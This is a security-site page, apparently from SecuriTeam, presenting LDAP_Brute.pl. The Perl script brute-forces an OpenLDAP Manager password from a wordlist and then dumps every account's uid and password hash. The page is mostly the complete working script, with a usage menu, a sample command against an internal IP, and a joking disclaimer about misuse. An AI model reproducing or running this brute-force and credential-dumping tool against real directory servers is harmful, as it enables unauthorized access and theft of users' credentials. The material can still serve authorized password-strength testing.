SecuriTeam - LDAP Authentication Brute Forcing

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

Ask the Team
Mailing Lists
Advertising Info
Advisories
About SecuriTeam
Blogs

Brought to you by:

Suppliers of:

SecuriTeam in Your Inbox

New vulnerability?
New tool?
Tell us
(Our PGP key).

CanSecWest 2012

2nd Annual Cyber Security

Hack In Paris

Credit:
The information has been provided by Victim1.

Website Security Scan	Code Vulnerability Test	Network Assessment Tool
Detect hidden vulnerabilities	Exhaustive automated testing	Real-time, continuous security
Get guidance from professionals	of internal or 3rd party code.	scanning for your entire network

Protect your website!
Use an External Vulnerability Scanner!
Nothing to install. First report in 1 hour!
www.beyondsecurity.com/vulnerability-scanner

The following tool will allow you to brute force an LDAP Manager password and then dump all user and passwords from the Database.

Tool:
#!/usr/bin/perl
# LDAP_Brute.pl

# by: Victim1
# shouts to all AngryPacketeers !!
# http://angreypacket.com

# recommendation: start the $arg u (user) with something like asmi* for as in Ann Smith or something, be creative they are only users

# Extra Info: This was written and tested on Slackware 8.0 against OpenLDAP.
# this sorta slow but gets the job done.

system("clear");
print "Starting Crack:\n";
print "---------------\n";
use Getopt::Std;

getopts("t:d:b:u:l:?", \%args);
# continue with normal crack
if($args{t}) {
    $target = $args{t};
} else {
    Usage();
}
if($args{d}) {
    $dn = $args{d}
} else {
    Usage();
}
if($args{b}) {
    $base = $args{b}
} else {
    Usage();
}
if($args{u}) {
    $user = $args{u};
} else {
    Usage();
}
if($args{l}) {
    $dictionary = $args{l};
} else {
    Usage();
}
if($args{"?"}) {
    Usage();
}

# start
brutality();
ldap_connect(@passwords);

# Start Brute Force of LDAP Manager Password.
# should return this: -->
# As this is what we will be expecting for a return...
# jsmith:{SHA}JheluJmppdiUiMJhn9X1raH26fA=:0:0:/jsmith:
sub ldap_connect {
    foreach $password (@passwords) {
        use Net::LDAP;
        $ldap = Net::LDAP->new($target);
        $ldap->bind ($dn,
                     password => $password
                     );
        $ldap->unbind;
        print "Manager -> Guess: $password\n";
        get_accounts($target, $password);
    }
}

# OPEN Dictionary and Brute force LDAP server.
sub brutality {
    #lets load up dictionary
    open(DICT, "<$args{l}") or die "Cannot open: $args{l} $@\n";
    @passwords = <DICT>;
    close(DICT);
    chomp @passwords;
}

sub get_accounts {
    # lets swipe user accounts and SHA_Base64 Keys.
    use Net::LDAP;
    $ldapc = Net::LDAP->new($target) or die "$@";
    $ldapc->bind($dn, password => $password) || die "$@";
    $mesg = $ldapc->search (
                            base => $base,
                            scope => "subtree",
                            filter => "(uid=$user)"
                            );
    $mesg->code && die $mesg->error;

        # this is a fucking pain in the ass to break a fucking loop ?? isnt it...
        $i=0;
        foreach $entry ($mesg->all_entries) {
                @uid=$entry->get_value('uid');
                @pass=$entry->get_value('userpassword');
                $test = ($uid[0].":".$pass[0].":".$i.":".$i.":/".$uid[0].":");
                if ($test =~ /$uid[0]:{SHA}/) {
                    print "CRACKED MANAGER PASSWORD !!!! -> $password\n";
                    print "$test\n";
                    sleep 2;
                    print "Dumping Database please Wate\n";
                    dump_database();
                    exit;
                } else {
                    $ldapc->unbind;
                    return 0;
                }
            }
}

sub dump_database {
    $ldap = Net::LDAP->new($target) or die "$@";
    $ldap->bind($dn, password => $password) || die "$@";
    $mesg = $ldap->search (
                           base => $base,
                           scope => "subtree",
                           filter => "(uid=*)"
                           );
    $mesg->code && die $mesg->error;

    $i=0;
    foreach $entry ($mesg->all_entries) {
        @uid=$entry->get_value('uid');
        @pass=$entry->get_value('userpassword');
        print $uid[0].":".$pass[0].":".
            $i.":".$i.":/".$uid[0].":\n";
    }
    $ldap->unbind;
}

# APP USAGE ----->
##################
sub Usage {
    print <<USAGE;
  Usage: perl LDAP_Brute.pl [-?] -tdbul
      -t Target
      -d dn -> cn=Manager,o=organization,c=country ( US )
      -b base dn (o=Microsoft,c=US)
      -u User
      -l Password List ( Dictionary )
      -? This Menu
        Sample: perl LDAP_Brute.pl -t 192.168.20.10 -d cn=Manager,o=MicroSoft,c=US -b o=Microsoft,c=US
-u jsmi* -d /usr/local/lib/Cracklib
          Note: You are on you own if you do something Naughty little wee wee's ~!
USAGE
    exit;
}
##################

blog comments powered by Disqus

	Apache mod_rewrite Vulnerability PoC
	netsniff-ng - A Linux Network Analyzer and Networking Toolkit
	Simple Local File Inclusion Exploiter
	NiX A Linux Brute Forcer
	Nchop - A TCP Session Splicing Tool Used to Rvade Intrusion Detection Systems
	Netifera - Modular Open Source Platform for Security Tools
	WarVOX - Tools for Exploring, Classifying, and Auditing Telephone Systems
	Webshag - Web Server Audit Tool
	Browser Fuzzer
	FSpy - Linux Filesystem Activity Monitoring
	telnetrecon - Telnet Recon
	Zerowine Sandbox
	JPEG Fuzzer
	VNC Server Fuzzer
	RSH Fuzzer